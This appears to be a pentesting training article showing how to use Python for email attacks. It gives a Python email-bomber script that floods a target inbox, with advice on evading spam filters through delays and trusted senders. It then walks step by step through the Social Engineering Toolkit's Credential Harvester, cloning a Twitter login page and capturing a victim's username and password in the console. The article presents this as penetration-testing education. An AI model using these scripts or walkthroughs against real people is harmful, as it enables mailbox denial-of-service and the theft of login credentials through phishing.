Email-based attacks with Python: Phishing, email bombing and more
The ability to send emails using an automated software tool such a python script can be useful in performing mass email based phishing attacks. This article discusses how Python can be used to perform email based attacks such as sending mass emails. In addition to it, we will discuss the Social Engineering Toolkit (SET), which is a tool written in Python.
Learn Python for Pentesting
Can Python-based tools be used for phishing?
Python is a scripting language with great community support. Because of this heavy community support, several offensive tools have been developed in Python. For the same reason, it will also be easier to develop python based offensive tools even for beginners. Phishing is no different. There are several python based tools developed for phishing attacks. It is possible to send sophisticated phishing emails using Python. Social Engineering Toolkit(SET) by Sensepost is a great example of Python based phishing tools. The Social Engineering Toolkit comes preinstalled with Kali Linux and we will discuss some features of Social Engineering Toolkit in a later section of this article.
What is a Python email sender?
A python script that can send emails is generally termed as python email sender. Python comes with great support for sending emails. Without requiring additional installations, we can use the built-in module available in its standard library for sending emails via SMTP.
The following line can be used to import the smtplib module which gives us the ability to send emails.
In all our examples in this article, we will use gmail as an example. By default Google doesn't allow us to connect to a gmail account to send emails and thus the following step is required before proceeding further.
Access the following URL using the google account we want to send emails from.
Enable the button as shown in the following figure.
Now, the following python script can be used to send an email from this email id.
subject = 'Python Email'
body = 'This email is sent using python'
message = f'Subject: {subject}\n\n{body}'
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("username", "password")
server.sendmail(
"from email address",
"to email address",
message)
server.quit()
Just make sure that highlighted fields are appropriately replaced with actual values. Running this script will send an email to the email address specified in To field. In the following figure, we can verify that the email has been successfully delivered.
What is a Python email bomber?
According to Wikipedia, “an email bomb is a form of net abuse consisting of sending large volumes of email to an address in an attempt to overflow the mailbox, overwhelm the server where the email address is hosted in a denial-of-service attack (DoS attack) or as a smoke screen to distract the attention from important email messages indicating a security breach”.
A python program that is capable of sending large volumes of emails to flood the victim is termed as email bomber. Writing a simple email bomber in python is as simple as keeping the program shown earlier in a loop. While, this is simple to develop; it is also simple to get caught by spam filters due to its simplicity. Because of this, we will need to employ various other techniques such as using time delay, sending from a trusted source etc to avoid detection.
The following script shows an example of a simple email bomb that sends 10 emails to the specified email address. The number in the while loop can be increased to send more emails, but this proves the point.
subject = 'Python Email'
body = 'This email is sent using python'
message = f'Subject: {subject}\n\n{body}'
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login("username", "password")
i = 1
while i < 11:
server.sendmail(
"from email address",
"to email address",
message)
i += 1
server.quit()
Once the script is run, we can verify if the emails are delivered.
As we can notice, the emails have been delivered successfully. In this case, the from and to emails are the same. But it works the same way even when they are different.
Learn Python for Pentesting
Python, phishing and social engineering (SET): understanding the risks
As mentioned earlier, the Social Engineering Toolkit is a useful toolset that can be used for phishing and social engineering attacks. This tool kit is completely written in python and comes with a great set of features. Sending mass emails, phishing websites and payload creation are some of the features that are worth noting. Let us understand how SET can be used to conduct a simple phishing attack.
First, we can clone and install social engineering toolkit using the commands shown below.
cd setoolkit
pip3 install -r requirements.txt
python setup.py
Once the installation is successful, we can launch the toolkit using the command shown below.
This will show the following menu.
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Choosing 1 in the preceding menu will show the menu for Social-Engineering attacks, which looks as follows.
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
We are interested in setting up a phishing attack using a fake web form. So, choosing 2 in the preceding menu shows the options relevant to it.
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
99) Return to Main Menu
set:webattack> 3
Within Website Attack vectors, there are several attacks possible. In this example, we will use the Credential Harvester Attack Method to grab credentials from victims using a fake login page. So, choose 3.
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack> 1
We can choose existing Web Templates or clone a site. Let us choose option 1 to use a template that is available within SET. This will also pick the IP address for the POST back as shown below.
If this IP address is incorrectly picked, we can manually set one. The next step would be to choose a Website template from the list below.
2. Google
3. Twitter
set:webattack> Select a template: 3
In this case, we are choosing Twitter. Once done, everything will be set and we should be ready to send our link to the fake login page to the victims by various means such as sending emails.
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
When the victim visits the IP address (or the domain name), the following page appears.
If credentials are entered, they will be posted back in the SET console as highlighted below.
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=testuser
POSSIBLE PASSWORD FIELD FOUND: session[password]=hackmeifyoucan
PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
PARAM: scribe_log=
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=
PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Social engineering toolkit is a powerful toolset for anyone to perform social engineering attacks. The powerful features it brings along with the malicious payloads is surely a danger if it is used maliciously. User education through internal phishing campaigns is one of the effective ways to prevent such attacks.
Learn Python for Pentesting
Sources
Learn Python for Pentesting
Get in-depth experience using Python for penetration testing with four hands-on courses. What you'll learn:- Basics of Python
- Exploiting vulnerabilities
- Network pentesting
- Web application pentesting
- And more
In this Series
- Email-based attacks with Python: Phishing, email bombing and more
- Enhancing code security: Tools and techniques for safeguarding your code
- DevSecOps Tools of the trade
- Software dependencies: The silent killer behind the world's biggest attacks
- Software composition analysis and how it can protect your supply chain
- Only 20% of new developers receive secure coding training, says report
- Introduction to Secure Software Development Life Cycle
- How to control the flow of a program in x86 assembly
- Mitigating MFA bypass attacks: 5 tips for developers
- How to diagnose and locate segmentation faults in x86 assembly
- How to use the ObjDump tool with x86
- Debugging your first x86 program
- How to build a program and execute an application entirely built in x86 assembly
- Overview of common x86 instructions
- x86 basics: Data representation, memory and information storage
- What is x86 assembly?
- Introduction to x86 assembly and syntax
- Introduction to variables
- How to mitigate Race Conditions vulnerabilities
- How to avoid Cryptography errors
- Cryptography errors Exploitation Case Study
- How to exploit Cryptography errors in applications
- How to exploit race conditions
- Attacking Web Applications With Python: Recommended Tools
- Attacking Web Applications With Python: Exploiting Web Forms and Requests
- Attacking Web Applications With Python: Web Scraper Python
- Python for Network Penetration Testing: Best Practices and Evasion Techniques
- Python for network penetration testing: Hacking Windows domain controllers with impacket Python tools
- Python Language Basics: Variables, Lists, Loops, Functions and Conditionals
- How to Mitigate Poor HTTP Usage Vulnerabilities
- How to Exploit Poor HTTP Usage
- Introduction to HTTP (What Makes HTTP Vulnerabilities Possible)
- How to Mitigate Integer Overflow and Underflow Vulnerabilities
- How to exploit integer overflow and underflow
- Introduction to Parallel Processing
- What are Race Conditions?
- How Are Credentials Used In Applications?
- How To Exploit Least Privilege Vulnerabilities
- XSS Vulnerabilities Exploitation Case Study
- What is is integer overflow and underflow?
- SQL Injection Vulnerabilities Exploitation Case Study
- How to exploit improper error handling
- Improper Error Handling Exploitation Case Study
- Why Improper Error Handling Happens
- How to exploit CSRF Vulnerabilities
- How to mitigate CSRF Vulnerabilities
- What Causes Command Injection Vulnerabilities? (How are Data and Code Handled in Execution Environments)
- Command Injection Vulnerabilities
- Command Injection Vulnerabilities Exploitation Case Study
- How to mitigate Command Injection Vulnerabilities
- How to exploit SQL Injection Vulnerabilities
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Secure coding